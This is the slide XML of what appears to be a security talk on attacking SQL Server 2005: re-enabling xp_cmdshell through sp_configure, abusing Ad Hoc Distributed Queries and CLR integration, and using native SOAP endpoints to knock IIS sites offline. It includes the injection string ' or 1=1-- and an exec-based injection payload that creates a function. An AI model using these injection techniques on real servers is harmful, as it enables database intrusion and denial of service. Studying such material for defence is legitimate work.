            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every one of the (many) SQL Injection tools out there uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sp_configure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to re-enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This is an old lesson for SQL Server to learn!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In fact _all_ of the features widely screamed to be locked down, can be re-enabled within the same channel. (the same channel that SQL Injection rides in on!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This shared channel for configuration/administration obviously buys us some convenience, but a secure design?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sp_configure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; RECONFIGURE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ad Hoc Distributed Queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(used by many tools to brute-force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(used by many tools for effective data extrusion – SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DataThief</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Almost as famous as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>‘ or 1=1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CLR Integration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The gateway to much fun..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In-band signals FTW!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="recon-all.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181600" y="4527176"/>
            <a:ext cx="3962400" cy="233082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SQL2005 – Some new features</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other than old favorites, we are going to look at 2 new ones:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Native XML Web Services;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CLR Integration.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="dancing_pigs.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7251700" y="5440975"/>
            <a:ext cx="1892300" cy="141702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Native XML Integration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The marketing pitch:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2065" i="1" dirty="0" smtClean="0"/>
              <a:t>“Microsoft SQL Server 2005 provides a standard mechanism for accessing the database engine using SOAP via HTTP. Using this mechanism, you can send SOAP/HTTP requests to SQL Server”…” Since the SOAP/HTTP access mechanism is based on well-known technologies such as XML and HTTP, it inherently promotes interoperability and access to SQL Server in a heterogeneous environment. Any device that can parse XML and submit HTTP requests can now access SQL Server.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Native Soap Integration and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wiley</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Comfortable X-Platform Query Manager?</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Web-Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS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Denial of Service is boring!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But boring will hurt you just as badly as anything else..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="endpoint1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2970013"/>
            <a:ext cx="4190552" cy="3506987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="web-ref.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="2667000"/>
            <a:ext cx="4343400" cy="2211974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="soap-ver.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="5105400"/>
            <a:ext cx="2286000" cy="1389062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1905000" y="3429000"/>
            <a:ext cx="4191000" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175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ight Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="3200400"/>
            <a:ext cx="3124200" cy="400473"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:pr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ormAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo: Web-Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="2133600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> now interacts directly with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>http.sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in the Win2k3 kernel to manage created endpoints.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When included within a standard ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CREATE ENDPOINT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’ call, MSDN is quite specific: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>while the SQL Server-based application is running, any HTTP requests to this endpoint are forwarded to the instance of SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. ”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="3505200"/>
            <a:ext cx="9220200" cy="3505200"/>
            <a:chOff x="0" y="3200400"/>
            <a:chExt cx="9220200" cy="3505200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="Picture 3" descr="browse-slashtest.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="3200400"/>
              <a:ext cx="3352163" cy="2819400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4" descr="ep-dos.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3048000" y="4191000"/>
              <a:ext cx="2895600" cy="2260948"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5" descr="test-gone.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5943600" y="3499627"/>
              <a:ext cx="2362200" cy="1986773"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6" descr="wsdl.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6864626" y="4724400"/>
              <a:ext cx="2355574" cy="1981200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="3200400"/>
            <a:ext cx="3048000" cy="400473"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Right Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="3200400"/>
            <a:ext cx="2819400" cy="40047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sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="3200400"/>
            <a:ext cx="363313" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284887" y="3200400"/>
            <a:ext cx="363313" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="3200400"/>
            <a:ext cx="363313" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>3.</a:t>
            </a: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surely this needs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>privs</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_had_ to come up with threat modeling.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure marketing docs mention: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Both the Windows account and the SQL Server account that SQL Server 2005 impersonates must have local Windows administrator privileges for the HTTP endpoint registration to succeed.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bah! Sounds like we are out of luck..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MSDN (again): “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>If you execute the statement in the context of a SQL Server account, for example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> or some other SQL Server login, SQL Server 2005 impersonates the caller by using the SQL Service account, specified when SQL Server is installed, to register the endpoint with HTTP.SYS.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ah.. So all we need is to be SA / in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (will that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>ever</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> happen??</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 == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> on every IIS Instance ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="8229600" cy="5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IIS Server running multiple sites (using name based or IP based virtual hosting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Service account given </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FileSystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> restrictions to ensure that SQL DBA cant deface / affect other customer sites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sounds like “NT Port bind, 10 years later..”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="site.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="3886200"/>
            <a:ext cx="3631746" cy="1803175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="server.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="3962400"/>
            <a:ext cx="6649429" cy="2036678"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:srgbClr val="3366FF">
                <a:alpha val="75000"/>
              </a:srgbClr>
            </a:glo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dirty="0" smtClean="0"/>
              <a:t>Demo: endpoints for fun and profit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="inject-function.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-36130" r="-36130"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1219200" y="1200370"/>
            <a:ext cx="5715000" cy="3143030"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="1828800"/>
            <a:ext cx="5791200" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>exec('CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> FUNCTION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>getServerVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() RETURNS NVARCHAR(MAX) AS BEGIN;RETURN (@@VERSION);END')--</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="ep-create.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
